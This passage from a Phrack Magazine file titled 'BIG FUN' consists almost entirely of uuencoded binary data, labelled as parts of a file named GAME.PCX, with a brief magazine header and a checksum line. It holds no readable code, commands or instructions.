MP"#!^</QP<\_P?\XPO@'P<?!X@`(P?_"\<'?P>/"/\'_P>#"YS^?P?C!_,'AL
MP?#!X\'AP>>./,)XP?#!_\/AP?_!PX$/.,'_P?!P8<'QP>/!P"S!^'G!QX!\P
M`,'_P?`!P>`_@'S!_,'P``/!^"_!X'P'P>#"_\'GQ/_!X\7_P>/$_\'YP?_!#
M^<'QT?_/_\'YPO'%_\'PP?_!\,/_P?/!_\+P8<'_P?@`P?P`?WY\>,'PP?'!P
MY\'\P?#!_#X``\'@<<+@P?_"\,'QP?_!X\'&/'XXP?C"\<'GP>1_P?_!\,'Q8
MP>/!X<'?P</"_\'`<</QP?/!S\'_P?YXPO@#P<?!X`!XP?_"\<'?P>/"/\'\=
MP>#!Y\'B?\'_P?C!_\'CP?#!Y\'QP>?!_GS!^,'PP?C!_\'CP>'!Y\'_PL?!7
MW'Q_P_#!\<'CP</!Q'AQP<>`>'#!_\'@0<'`'X!XP?S!\``!P?`'P<!\!\'@L
MP?_!_$'!^,'_P?C!]\'@PO_!\<+_P>'$_\'PP?_"\='_X/_"^<'_P?[!\<'_)
MP?#"_\'^P_G!_\'\P?'"_\'P?\'P8,'@8<'_P?AX8<'_P>!^?W!\<,+PP>#!!
MYGQ_PO#!X\'QP??!X\+_P>Q\P?G#\<'_?\'_>,'XP?_!\<'GP?)XP?C!_\+QW
MP?_!XWX_P?A@P>?!X'_!_\'XP?_!X\'XP>?!\<'B?GC!^'#!_,'_P>?!\<'G5
MP?_![\'_P?QX?\'XP?'!^,'PP>/!_\'B<''!Y\'^>,'XP?_"X<'PP>;">,'\Y
MPO#!\<'PP>'!X#PG8'_!_&#!\'_!^&'!X'_!_\'@P?AAP>#!^'_!_\+PP?_!?
M\,'XP?_!_,__YO_!^\3_P?O#_\'[PO_!\'_!X`'!X$/!_\'X>`?!_\'`PC\`(
M?$!X0<'@#SA_P?#!X,'CP>'!PX/!_P\,?'G!\<'AP?/!SS_!_SC!^'_!\<''?
MP>,_P?C!_\+QP=_!X\(_P?@@P<?!XG^?P?C!_\'CP?C!Y\'QP>(^>,'\<<'\V
MP?_!Q\'QP>?!_\'/C\',`'_!^,'SP?C!\<'#/\'"<''!QSXXP?C!_\'#P>,?)
MP<9_>,'\PO#!\<+A@8\/"#_!^'#!\'_!^$/!X`/!SX!X`<'`P?`?P?_!P,'@-
M?\'@>`/!^'_.__O_'\'_P<=_P?_!Q\'_!GX'P?H?@G_!_`!'P>/!P`_!_P`?(
M`'O!^\'CP?./'\'_'GQCP?.'CQ\<?\+SC\''PA_!^,'PPL<?G\'\P?_!Q\'XR
MP<?!X\'B'AQ\.\'^P?^/P?/!Q\'_P<^/C@`_P?C!Y\'\P?/!QQ_!QQ`'AQ\\5
MP?S!_\'/P<<?AC_"_'/!^,'[PL/"CQ\/O\'\?GC!_\'SP=/"PX\>'%'!P\'CE
M#\'_!C!_P>!X`\'P#\[__?^/PO_!S\'_#\'_#\'_'X=_P?X/P<_![\'`#\'_E
M`!\!?\'_PN>/#\'_'GQC!X?"#QX_P>?!XX^'PA_!_,'PA\''PA_!_']'P?_!!
MS\'GP>`^''P_P?[!_X_!Y\'/P?^/#XX/?\'YP>?!_,'CP<<?AP8'CQ\]P?S!6
M_X_!QQ^&/\'\?#/!_\'[@P/"C\(/P?_!_<'^/\'_P>?!_\+'CQX=?\+'C\'_G
M#CW!_\'YP?@#P<8/SO_]_\'/TO\//X_#_\'WPH_!_S_!_WX'A@^&'P?![\'WM
MP<</PA_!_@('P<?"#\'^'B?"QX?!ZG\>?C_!_L'_A\'GP<_!_\./'\+_P>?!2
M_\'CP<</A\('A\(?P?[!_\'/P<<?P<8_POXWP?_!\X('PH\/AS_!_\'^+\'_V
MP>?!_\''P?>/P@_!_\+'O\'_GC_#_\'GP<>'SO_]_X_2_X_'_X_!_S_!_\'\Q
M!X`?@#\#P?C!]\'@'S\?P?P`!\''AA_!_!S!\8/!QX?!^'X\P?P\P?S!_X?!=
MY\'/P?_!SX^./\'_P?G!Y\'\P>'!QQ^/P@>'/SS!_,'_P<_!YQ_!QG_"_,'SF
MP?W!\8`'PH\/P<`_P?G!_C?!_\'GP?S!Q\'SC@01P?_!Y\'P/\'_P?P]P?_"8
M^<'QPL?.____T?^_S?_!Q<'_P?W!_\'[P?W!_\'XP__!_##![\'GP>`_P?\`#
MP?`#P>`'P?C!_GC!_'A@P?_!X,'CP>?!_\'GC\',.'_!^<+PP?'!X\*/@P?!O
MQS\XP?C!_\'#P>&?P>9_P?C!_,'QP?C!\<'CP?^/AS_!^#_!\<'\<<'_P>'!T
M^,'CP?'!Q`!QP?_!X\'P+\'_P>!YP?_!^<'QP?#!X,'CSO___]__P<?&_\']I
MQO_!]\'PPO_!X<'X<\'@?\'XP?[!^,'\P?A@P?_!\$?!Y\'_P>/!_\'>,,'_)
MP?'!\,'AP?'!X\'`/\'#A\''P?YXP?#!_\+CG\'&?GC!^,'QP?#!\<'CP?'!=
MW\''PO]_P?'!^''!_\'QP?#!X\'QP<1PP?'!_\'CP?A'P?\`><'_PO'!\,'`S
M`\[____T_\'@P?_!^,'_P?W!_L'\<,'_P?A_PO_!\\+_P>#!_\'YP?AAP?'!0
M\\'P?\'WP?_!Y\'^?'#!_\'P8\'@/G!X<,+PP_'!_\'GP?]_P?_"^'G!_\'Q5
MP?#!\\'QP>1_P?#!^<'SP?_!X\'\<'G!_\'YP?'!^,'@P?/.____W__!S]3_\
MP>?!_\'YQ/_!\,'_P?S#_\'SPO_!X<+_P?X#P?O!_\'P?\'_P=_!S\'_?`#!O
M_\'@`\'`'X!\`,/QP>#!PY^'P@\?POAYP?_!\<'PP>/!\\'.?W#!^<'CP?_!'
MX\'^?'G!_\'YP?'!^<'#S_____3_P<?!_\''P__"_M;_B,'_P?X?P<8?@\'^F
M`L/_P?H/GX\/`A_!_@/!^\'_P?@#P<('CQXX$\'GPL?!_AX[P?_"^\'_P<_/R
M____]/_!S\'_A\/_P?P/UO^<Q/]_PO\/P__!_@^?CP^$/\'^!\+_P?X'P<`/:
MCPX^!\'GP<</P?\,'\3_PL_.____]/_![\'_P<_#_\'^!];_#]/_C\/_#\'O;
M#X^'P?\'P>?!Y@_!_P8??\'_?\'_P<<'SO____O_#]7_P?P#U_^_P?^_C\'G>
MP?^/P?_!_!_!_P<<?\'\?\'_P?`/SO______TO_!_`':_\'/RO_!_<+_P?@O#
MSO______[O_!S]W______^W_P?Y_W?_________-_________\W_T/\_Q__!3
MS______S_]#_/\?_P<______\__/_\'^/\?_P<_!_\']R/_!_G_!_\']SO^?O
M_____];_S__!_'_'_\'OP?_!^<C_P?S!_\'YP?C,_\'^?[W_____UO_._\'@G
MP?QX9\'PP?_!X\+_P?#!Y\'QP?#$_\']P__!^,'_P?C!_<S_P?Y^?,/_P?'![
M_\'GPO_!^<7_P?[!]______&_\[_P>!\>&/!\'[!X<+_P?!OPO#!_L/_P?C#A
M_\'XP?_!\,W_P?["?,/_P?'!_\'WPO_!^<7_P?[!]\7_P?[_____SO\#'#AAW
MP<`<`,+_P>`'`'!X`\+_P<!\`<'\`'_!\'C!\`!?P?#"_\'#P?A_P?C!_\'X`
MP?_!_'_#_\'SP?_!Y\+_P?G%_\'XP>/![\'_P?S"_\'\?____O_._P\>.$.&R
M'AK"_\'"#P80?`/"_X(>`<'^`'_!\#[!\@(/P<)_P?\#P?(/P?X?P<9_P?X?/
MP?^?P?^7P?^/PO_!^\7_P?[!Y\'?P?_!_L+_P?Y____^_\[_#XX_AP^>/G_!1
M_\*/'AQ]P?O"_X\.#'P,?\'\/&`"!XX?P?X,P>`#P<(/AAX\#C\'P?P'P?^&U
M'X?!_\'^#\*_P?_!_<'GP?_!S\'\?\'_GC_+_\'/RO_!Y___Y__._P^//X</0
MGAY_P?_"CYX?POO"_X\.'G]^?\'_P?[!XX.'CQ_!_@_!X@/!QP>''CX./@?!.
M]@?!_X8/A\'_P?X/GQ]_P?_!YX^'P?X_P?^.?X_!_Y_(_X_*_\'GQO\____@%
M_\[_#XX\`1_!_`!_P?\/P<^`&,'@`<+_P?X,?''!_'_"_,'SP>/!YQ^?P?X_O
MP?'!\,+''Y["/L(\8\''P?_"APP\P?`'CAY_P?'!YX\`,#_!_@!^`<'\!\'/1
MP>^`!'^/P?^_C\C_P?S%_\'SPO\____@_\[_O\',>`&_P?@`PO^/P>_!X#C!_
MX`#"_\'@/,'X<<'XP?_!\,'XP?'!X<'B'Y_!_#_!\<'PP</!XC_!_L)\>,'X[
MPN'!_\'!P>8X>,+AP<X\?\'QP>&/`'!_P?@`?`#!\`/!Y\'C@"!_`<'P/X/!C
M\,+_P>'$_\'XQ?_!\<+_/___X/_/_\'$<,'QO\'XP?'"_\'?P>8`>,'PP?'"@
M_\'`.,'X<<'XP?_"\,+SP>(`'\'^`,'QP?#!P$)_P?["?'#!\&/!\<'_P<?!K
MX'APP>/!\<',','_P?'!X<'./'#!_\'XP?!XPG#!\,'#P>/!P`!\8,'P1\'!V
MP>!_P?Q`P?A_P?[!P,'P8<'SP?!_P>'!\,'X___B_\__P>QPP?'!_\'XP?O#N
M_\'N<'C!\,'QPO_!X#C!^''!^,'_PO#"\\'B('_!_F#!\<'PP<!@?\'\PGS"U
M<&/!\<'_P>?!X,)PP>/!\<'L.,'_P?'!X<'L/,'XP?_"^,)X<,'PPN/!\#!X<
M<,'PPF/!X'_!_'#!\'_!_&#!\&'!\\'@?F#"\'___^'_SO^#'#'!X8>8?,+_!
MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5
MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO
MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P<Y____?_\[_!AXPN
M`8\>/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^
MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?;
M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$
MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W(
MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P<?"'QP`9\''F
MCX?!_\']P?X]P?_!_,'_/<'\9X^./WO!\\'_C___X/_._P<_/@?!QA\'P>?!M
M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q
MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P<?"'QX&9\''CX<_PO\_H
MP?_!_L'_/\'^1P\.?\'WP>.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_=
M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P</!#
MX<'!P?_!X\'GCS\\P?_!^<'^.<'^(\'_PL?"'Q@/P>?!QX_!_!_!^<'^.<'_,
MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X
MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\
MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!`
M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F
M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP<XP>,'_P?AP>'#"\,'AP</!K
M_[^XP?C!\\'CP<_!_X_!^,'\>,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G
M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$
M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1
MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!(
M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U
MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2
M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N
M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_
M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5
MY/_!]\;_?___X/_________-_________\W_________S?_________-____U

sum -r/size 20457/59873 section (from "begin" to last encoded line)



--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 7 of 28

****************************************************************************

                                BIG FUN
                                (cont)


section 2 of uuencode 4.13 of file GAME.PCX    by R.E.M.

M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5
M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/
M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\
M!\(&#@<.!L</'Y\?G______._]G_P=_"_\'?PH_&#\,'!L('!@?(!@<&!P;#0
M!\,/PH^?C______)_^[_OX^?P?^_G\0/!@0`!L(`!,0`!``$P@8$!L('G\*_8
M___\__C_P?W!\<'PP?W!\,'@8,'@QR``(,,`PB!@P>'!\<'APOG___?_SO_!_
M\\3_P?'R_\'QQO#$8$#$8,'@P?#!X,;PP_'!^?__Z/_-_\'\<<'_P?G!_'?!\
M\/C_P?C#\,)P8'#+8,-PQ/#!^,+YP?C!^<+_P?W__]W_S?_!_&'!_\+X0X#^W
M_\+[P?G!\,'[P?#!X,'PPF##0,D`0,(`0&#!P$!@<<'QP?#!^<'[___6_\W_B
MP?[!\Y_"^`<?___'_\'?P?_#WY_"'\(.P@;"`LD`Q`('!@?"#Q___]#_S?_![
M_G\?P>Q_P?\?___4_\*/Q`_##L0&Q03$!@[&#Q_"#\(?#\*?PO_!W_O_S?_!8
M_K<?P>=GP?\?___9_X_!W\./Q`_$!\(&!\(&!P8'Q`;#!P;#!\</PH_"_\'/(
M\O_-_\'\!S_!YG/!_P?__^?_O\+_G\(/CP8.PP3"``8$RP#"!``//P\?GQ^?`
MP?^/Z?_-_\'\`[_!X''!_X'___#_P?W!Y<'YPO'!_\+QP?##X&#%(,0`QB!@K
MPB!QP>#!^<'PP?'"_\+]W__-_\'\PO_!X''!^\'S_____\+_P?G!\,'_P?')!
M\,'@Q6#"0&!`Q&!PQO#"^=+_S?_!_,+_P>!PP?'_____T?_!_<'YP?W!^<'X)
MPO#"<,'P<,9@<,1@PG#!\,'SSO_-_\'\P?\_P<!PP?$______];_P?O!^<'[,
MP?C!\,'SP?!@PD``8$#&``/._\W_P?[!_P(?G@<&?___\/_!S\'_'\+_'Y_N,
M_Y\?#\[_S_\&'YX/!G____#_P<_!_@_!_\'F'P_$_Q_!_P_X_\__P=_"_Y^/<
M___Q_\'/P?X'P>_!YAX/P?_"'SX/P?X/P>?!]\'''_3______\;_P<_!_:?!&
MX<'\/#_!_\(?.`?!_`S!X\'SP<0_]/______QO_![\'YP?'!X,+\PO\?#WG!0
MY\'\?,+AP>?U_______'_\'YP?'!X,'\P?C!_\'^7H;!\<'SP?Y\P?'!X?;_V
M_____\?_POC!X,'\P?A_P?S!]C!YP?'!_GS!\,'@P?#U_______'_\+YP>#!C
M_,'X#\'\P<<P><'SP?]\P>#!P<'`?_3______\;_P<_!_<'Y@'[!_!_!_@<8C
M.\+_/D0#P<)_]/______QO^/P?W!_X`^PO_!_`<<.\'OP?\^#@^/?_3_____8
M_\;_C\'_AX\_P?^?P?X''A_!Q\'_/@8/C_7______\;_P=_!_`>?/L'\G\']P
MP><^.8?!_S[![A./]?______Q__!^"?!_\']P?PCP?G!\<'^>"?!_WS!]SG!R
MX/7______\?_P?S#_\'\P?/"^\'^P?A_P?_!_,'_P?G!X'_T_______6_\'X5
M]?_________-_______&_\'?___&_______&_X___\;______\;_P<___\;_\
M_____\;_P=___\;_________S?_________-_________\W_________S?__P
M____QO_!W___QO______QO_!W___QO______QO_!S___QO______QO_!W___6
MQO_________-_________\W_________S?_________-_______&_\'?___&^
M_______&_Y___\;______\;_C___QO______QO_!W___QO_________-____)
M_____\W_________S?_________-_______&_\'?___&_______&_X___\;_G
M_____\;_G___QO______QO_!W___QO_________-_________\W_________H
MS?______QO_!W___QO______QO^?___&_______&_Y___\;______\;_G___Y
MQO______QO^?___&_________\W_________S?_________-_______&_\'?Q
M___&_______&_Y___\;______\;_G___QO______QO^?___&_______&_Y__1
M_\;_________S?_________-_________\W______\;_P=___\;______\;_.
MG___QO______QO^?___&_______&_Y___\;______\;_G___QO_________-A
M_________\W_________S?______QO_!W___QO______QO^?___&_______&:
M_Y___\;______\;_G___QO______QO^?___&_________\W_________S?__+
M_______-_______&_\'?___&_______&_Y___\;______\;_G___QO______"
MQO^?___&_______&_Y___\;_________S?_________-_________\W_____]
M_\;_P=___\;______\;_G___QO______QO^?___&_______&_Y___\;_____*
M_\;_G___QO_________-_________\W_________S?______QO_!W___QO__\
M____QO^?___&_\[_P@\?G___\_^?___&_\[_#P?##\*/OY^____M_Y___\;_7
MS?_!_@;"!`##!,,`Q00&PP^/Q+___]__G___QO_-_\']P>'!\<'PQ6#,(&#"#
MX,'QPOG#\<+_POW_____W?_;_\'YP?O!\<?PQ.#!\,'@RF#"X,-@P^##\,'Q]
MP?#!^,'QP?#!\?_____&_]O_P?W#_\']P?C!_,+XP_#!\<'PP?C"\'#!\,5P!
MPF!PQV#$<,;PP?C!_\']_____\+_^/_!^\'YPOC!\<'YP_!@Q4#%`,5`8,'P6
MP?G___?__/_!W\+_PM^?PA\>#L(&`@##`@`"`,,"!A^?P=\?G^O_G___QO__<
M_\S_P=_"_Y^_GQ\/#@;##L4&!\</PA^?P?^_VO^?___&____T_^_C\0/Q`<&!
M!\(&!P;#!\4/C\+?O];_G___QO___]__O\'_OY\/'X8$#L0`!``$P@8'P@_"(
MG\._S/^?___&____Y?_!_<'YP?S#8,L@Q&##\<'YP?W__\W____P_\+PP?'![
M^<7PP>#"8$!@0,9@`,)@<,+@QO#!^<'PP?'!^_;____T_\'YP_C#\,1PS&#"Y
M<&#$<,3PPOC!\,'XP?GP_______#_\/[P?_!^\/YP?O!^,'P<,'@PF!``$#*-
M`,)`PV#!\,/YY/______T/_"WY["'P[#!@(&S0(&PP\?G\+_P=_;_______?>
M_\.?'\0/#LH&R0\?G\_______^;_CY_%#\8'!L@'#Q_._______S_\./!\(&:
MP@3"``_._______Y_\']P?G!X<'PS__________-_________\W_________\
MS?_________-_________\W_________S?_________-_________\W_SO_#:
M\/_____[_\[_P?!@<'______^O_._\'@P?#!X$?_____^O_._\'/PM^'____Q
M__K_SO_!S\+_P>______^O_._\'/PO_!Y______Z_\[_P<_"_\'G______K_Q
MSO_![\+_P>?_____^O_._\'OPO_!X______Z_]'_P?/$_\']______7_SO_!6
M[\+_P>?$_\'\?______T_\[_P<_"_\'GPO_!S\'ZP?X#P?[!_Q_!_\'WP?\&&
M'XX/P?_!_@_!_Q______Y?_._\'/PO_![\+_P<_!]L'\!\+_'\'_P<?!_P0?&
M!@_!_\'^!\'^#\'_/\/_C\3_/P_!_\'?O______6_\[_P<_"_\'GPO_"Y\''?
MCC_!_Q_!_X?!_\(/!P_!_\''!\'^!C\/PN?!_X?!_A_!Q\'_'@8?A@>'#___V
M___4_\[_P<_"_\'GPO_"X\'#P?PXP?\?P?^#P?X?P@\?P?_!P8'!\`0^'\'AP
MP>#!_X?!_#_!P\'^/@`?@`>`!\S_P>______Q__._\'OPO_!Y\+_P?#"X\'\V
M>,'_O\'_P>#!_#_!YP_"_\'CP?C!X<'\/`_!X<'@P?^'P?`_P>#!_SQ]CX#!+
M_\'`P>'!_\'QRO_!X\+_P>?_____Q/_._\'OPO_!Y\+_P?#"X\'\<,/_P<#!_
M_'_!X\/_P<?!^,'AP?P\'\'AP?#!_X?!\#_!X,'^>'_!Y\''P?_!P\'QP?_!H
M\<K_P?/!]\'_P>?1_\'S___Q_]'_P??"_\'X;\'OP?YXP__!\,'\?\'CQ?_!)
MX\'_?"_!X,'P?B?!\#_!X'QX?\'GPO_![\'PP?_!\,'XPO_!^,'_P?O%_\'GE
MT__!\\+_P??$_\'WP?_!_,'YQ/_!^___X?_._\'OPO_!Y\+_P?@/P<_!_SC!(
M_W_!_YC!_C_!SPO"_Y_!_\'#P?\<#\'!P?!^!\'P#\'@?#Q_P>>/P?_!S\'P=
MP?_!X,'X?\'_P>!_P>'!_<'XP?O"_\''R_\?Q__!P\+_P<?$_P_!_\'\P?G$"
M_\'S___A_\[_P<_"_\'GPO_!_A_!S\'_&,'_'\'_'CX"#P(?P?\?P?_!Q\'_]
M#@>!P>`>!\'SC\'"PAY_P>>/P?_!S\'\P?_!P,'X!\'_@!\`P?S"``?!QX?!I
M_\'/DC\'P?X'P?X/P?X?#\'_P=_%_\'/P?_"C\3_'\'_P?YYQ/_!]___X?_.U
M_\'/PO_![\+_P?X?C\'_&<'_'\'_'CX$#P`/P?\/P?_!S\'_#@>!P>(>!\'WD
M#\'''CX_P>>''X_!_,'_P</!YP?!_X</#'S"``>'!\'_CP`_!\'\!\'^#\',%
M'P^?C\'_C\+_/X_!_\*/Q/\?P?_!_F_1_\'/___4_\[_P<_"_\'GP_\?C\'_8
M'\'_'\'_#C[##Q_!_P_!_\''P?\.!PO!YQY'P<>/P<>/'C_!QX8/P<_!_L'_O
MP??"Y\'_AX\>/C]KP>_!QX?!_X\'#PY^#G\'P<</!Q\&?@?!_\'V#P?!_\*'!
M'\'/PO\/P<_!_GO1_\''RO^_/\__O_?_SO_!S\+_P>?#_S_!S\'_.,'_/\'^3
M`#[##\+_'\'_P<?!_PXC&<'C'&?!QX?!QXX^?\'G@`_!S\'\P?_!]\'GP?'!2
M_X_!SCXPP_G!QX_!_X\/'CQ\''&#A\(/'@1X`\'_P?`/!\'_AX`?@'_!_`^%-
MP?QQP?\_S__![\C_O\'_PC_/_S_W_\[_P>_"_\'GP_\_P>/!_#C!_C_!_``\X
M/\'/O\+_C\'\P>/!_PQP.<'AB,'CP<`#P>/!X#Q_P>.'P?_!S\'XP?_!\<'G=
MP?'!_\'GP>`@,,/YP>/!Y\'_P<._/#W!^,'\8<'QP<?![[^<?'C!\<'_P>'!]
MX\'#P?_!P\'`AX`_P?P/`'AQP>`/PGS!\\'@?\'@PO_!X<__?\'_PC_$_\'QC
MRO\_P?_!_G_-_\'QYO_1_\'WPO_!_G_!X\'X>,'^?\'X8#Q_P>_#_\'7P?C!I
MX\'_/'!YP?'!P,'CP<`#P>/!X#A_P>/!W\'_P<?!^,'_P?/!Y\'QPO_!X`!PV
MP_'!X\+_P</!_\'\<<'XP?Q@P?'!S\+_P?C!_G#!\,'_P>/!\\''P?_!Y\'!1
MP>>P?\'\/G!XP?'!X,''PGS!\\'`/\'@?\'^8,'XP>S!X\+PPO?!\,'_P?/#P
M_\'XP?Y_P?_"?\3_P?'*_W_!_,'^S?_!Y\'AP>?"_\'^P?_!^>#_SO_!\,'Y9
MP?_!]\+_P?Y_PO#!^'A_P?A_?'_!Y\/_P>/!^,'QP?Q\<'C!\<'@P>/!X''!`
MX\'P/'_!X\+_P>?!^,'_P?'!Y\'YPO_!X'#!^,'YP?C!^<'CPO_!X\'_P?Y@M
MP?C!_L)@P__!^,'^>,'XP?_!Y\'QP>_!_\'WP>?!YG_"_SQ^>''"X<)XP?'![
MX,'WP>`_P?XPP?AX<,'P8&'!X\'@?\'@P?AWP?_!\'@_P?P^<,'^P?/!_\'XK
MP?'!^'Y[P?#"_\'WP?S!_\'X?\'\?\W_P?/!X</_P?Q_P?C@_\[_P<!@<<'GC
MPO_!_C_!\&#!^'!_P?A_#'_!QP_"_\'!P?#!\<'\/'!YP?'!P<'CC\'SP>/!L
M\#Q_P<>/P?_!Q\'PP?_!\\'GP?'!_\'/P<1_P?C#^<'CP<_!_\'#/Q_!P'C!Y
M_F`!P<_!_\'?&,'^.<'XP?_!S\'SP<_!_\+'P>8?/\'_'G\8<<''P>'".,'SM
MP</!QYX?P?XX<'APP>!`0<'CP<`^`,'P!\'_P>`8#\'\#P!^`<'_P?@!P?`<<
M`\'@P?_!_@/!\'_!X#_!^'_!_\'[S/_!P\/_P?Q_P?##_Y_<_\[_P<X&`@_#E
M_S_!_@/!_@!_P?[!_XX_P<<"#\'_P<`#P?@8/CQ[P>/!P\'GC\'SP<?!_,(>*
M#X_!_\''P=/!_\'SP>?!\\'_P<?!SC_!_,'_P?G!^\''C\'_P<<?#\'^?,'^T
M(\'?C\'_GQY_&<'XP?_!S\'SP<_!_\''C\'&`A_!_QY_'GF/P>/"','SPH\?$
MG\'^/SA\P?S!X\'AP?/!QX_"'G"'P?_!QPX?P?\/!CX#P?_!\`/!X@8'@C_![
M_@/!P`\`'\'\'GX"!\'^'\'_P?(_CW^/P?\?P?_!Q\/_P?Y_P?K#_Y_<_\__5
MP@\?P_\_P?\/P?\'P_^//\'/``_!_\'N!\'^`GX\?\'GP<?!YP_!_\''P?X^7
M#A^'#X<'P?_!]\'GP<?!_X>/'S_#_\''C\'_P<\?#\'^/'XGP?^/P<\/'G\?3
MP?W!_X_!]X_!_\*/P<8&'\'_'G\>>X_!XPP?P<?"CQ^?P?X_','\/&?!X\'OH
MP<>/'CXSPO_!SX\?P?\?#SP-P?_!XP?!QX?"#Q_!_@F'#PP?P?P>?``'P?0/D
MP?_!Q!\&'P?!_@_!SP?!S\''P?\.?\'_C\+_']S_U_^?P?_!S\/_P=_!_\'/-
MCP_"_P_!_P?$_\'GP>^?P?_!Q\'_/@<?@@>&#\'_P??!YP_!_X</#G_#_\'G-
MA\'_P<<?#Q["/F?!_\*/#QX_'\+_P<_!YX_!_\*/P<<?PO\?/QY[C\'GC@/!B
MQ\*/'Y_!_S\>P?P&9\'GP>_!QX?!_@XW'\+_CQ_!_\,?P?]_P<?!Y\'_AX\/<
M'\+_AX_"'\'^'CX"#\''!\'_AP\&'P=^!\''!\'/AC\&/\'^!\'_#X^'V__D7
M_[_!_[_*_SX%P?^`!\'`#\'_P?#!^`_!_X`?`,+]P?G!_\'GP<?!_\'''PX,-
M?!QQ@\''CP\>/CG!_<'_PL>/P?_"C\''/\+_'C\<<8_!XX`#P>>/CA^?P?Y_[
M','P`,'GP?/!\<'G@+P$-`_"_P\_P?_"/SC!_'_!Q\'CP?^''P\?P?_!^8>.*
MPC_!_C[">,'YP>?!Q\'_C\(/'AQX`\''A\''!#X`?\'\`\'T#Q\`P?_!Y\'OT
MV/_T_\']P?_!_<+_P?G!_,+_P>#!_\'APOW#_\'CP?_!Y\+_`,'X`,'X`\'@Q
M+\'''B#"^<'_P>'!X\'OP?_!Y\''P>>_PO\_/CAQP>?!X<+!P?/!S\'F/Y_!/
M_G\XP?#!\<'APO'!X\'P.`!X`\'_P>`'?\'_/W\P('_!Y\'QP?`#O``_P?[!W
MX,'GP>Q_/\'\?'C"^,'AP>/!_\'#P?X_B'AQP?'"X\'B/SAX?\'P<,'@P>.<(
M,'G!X<'CV/_]_\'CQ__!\\3_P>#!^&'!^&/!\'_!X\'^P>#"^<'_P?!'P>_!?
M_\/GP?!_P?]_?'C!\<'AP>/"P<'SP<_!YL'_P=_!_GYXP?#!^\/QP>/!_#C!F
M\,']P>'!_\'@!G_!_\)_<$#!_\'CP?'!\$/!_`!_P?@`P>?!Y,'_?\'\PGC"@
M^,'@P>'!_\'@P?Y_P<!P<<'QP>/!Y\'B?L+X?\'PP?C!X<'CP?S">,'AP>/8U
M____R__!^<'XP?O"_\'XP__!\<+YP?_!\'_"_\'SP?_!]\'@?\'_?\'P>''!B
M\,'GP>'!X\'SP>_!Y\'^O\'^?'C!\,'XP_'!X\'_P?C!_\'[P?'!_\'@P>9_#
MP?_"?W#!\<'_P>/!\<'@P>/!_##!_\'X<,'GP>S!_W_!_'QXPOC!X&'!_\'P[
M?G_!X'!SP?_!X\'GP>+",,'\?\+XP>'!\<'X?GC!X-G__?_!S\W_P?C+_\'\^
MP__!]\+_P>##_\'`P?C!\<'P!\+#P?/!S\''@!_!_CAXPOC!X\+QP>.?G,'^S
